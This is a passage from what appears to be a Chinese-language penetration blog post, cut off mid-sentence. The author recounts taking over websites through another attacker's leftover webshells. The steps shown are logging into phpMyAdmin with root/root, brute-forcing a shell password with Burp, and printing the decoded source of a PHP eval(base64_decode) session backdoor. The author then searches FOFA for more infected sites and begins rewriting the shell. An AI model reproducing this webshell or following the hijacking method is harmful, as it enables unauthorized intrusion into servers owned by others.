前言
有一次滲透中遇到了一個一個網站,上面只有一個imgaes.php的shell和一個別的一句話木馬還有一個phpmyadmin,於是搞下來了一大波網站,還總結了一系列的猥瑣滲透手法,可能已經被隱跡於各處的大牛用了,但是還是放出來讓大家玩玩吧,沒技術含量,大牛勿噴
正文
這樣就沒轍了麼,首先弱口令root/root進了phpmyadmin,可惜現在那幾個拿shell的方法都掛了,並且images.php和另一個shell也沒那些順便寫進去的路徑和sql查詢語句什麼的,像這樣
也沒phpinfo.php之類的,也不知道路徑,更懵逼了,然後用burp爆破了一波另一個shell,把密碼給爆破出來了,單字一個h,然後進去先沒提權,看了看images.php的源碼,如下
?>
整理一下就是執行後面這個字符串base64解碼之後的語句,即
@session_start();
if(isset($_POST['code'])){
(substr(sha1(md5(@$_POST['a'])),36)=='222f') && $_SESSION['theCode']=trim($_POST['code']);
}
if(isset($_SESSION['theCode'])){
@eval(base64_decode($_SESSION['theCode']));
}
這就不用我多解釋了吧,a就是密碼,code是語句,用菜刀還有個base64簡單混淆,但是這尼瑪密碼MD5了又sha1的,我是密碼學小白啊,咋破解,隨手在fofa上搜了一搜這個shell,一大堆,於是猜測這個人根本不去一個一個提權什麼的,他肯定不看,就用批量工具搞,於是,images.php的源碼被我無情的改成了如下,